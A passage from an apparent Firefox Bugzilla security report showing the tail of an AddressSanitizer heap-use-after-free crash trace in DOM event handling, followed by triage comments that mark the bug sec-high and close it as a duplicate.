#29 0x7fca5840ba5f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#30 0x7fca5840ba5f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134
#31 0x7fca5840d863 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
#32 0x7fca583ee40a in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:488:14
#33 0x7fca583f1522 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:825:9
#34 0x7fca583c072a in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:894:12
#35 0x7fca567679f1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1337:5
#36 0x7fca5839930b in mozilla::AsyncEventDispatcher::Run() /home/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:54:12
#37 0x7fca562c82ef in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5407:15
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1603:12 in GetBoolFlag
Shadow bytes around the buggy address:
0x0c1a8007c3c0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c1a8007c3d0: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
0x0c1a8007c3e0: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1a8007c3f0: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00
0x0c1a8007c400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
=>0x0c1a8007c410: fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd fd fd
0x0c1a8007c420: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
0x0c1a8007c430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1a8007c440: 00 00 fa fa fa fa fa fa fa fa 00 00 00 00 00 00
0x0c1a8007c450: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c1a8007c460: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8773==ABORTING
|
||
Comment 2•8 years ago
|
||
This looks similar to bug 1289970.
Flags: needinfo?(bugs)
Keywords: csectype-uaf,
sec-high
|
Assignee | |
Comment 3•8 years ago
|
||
Possibly related to bug 1346590 too. This stuff needs probably several days to rewrite parts of the DirectionalityMap.
|
||
Updated•8 years ago
|
Group: core-security → dom-core-security
|
|
||
Updated•8 years ago
|
Flags: sec-bounty?
|
||
Comment 4•8 years ago
|
||
Olli, is there someone else we can ask to take this?
|
|
Assignee | |
Updated•8 years ago
|
Assignee: nobody → bugs
Flags: needinfo?(bugs)
|
|
Assignee | |
Comment 5•8 years ago
|
||
This looks like a dup of bug 1346590
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
|
|
||
Updated•8 years ago
|
Flags: sec-bounty? → sec-bounty-
|
|
||
Updated•5 years ago
|
Group: dom-core-security
|
||
Updated•10 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•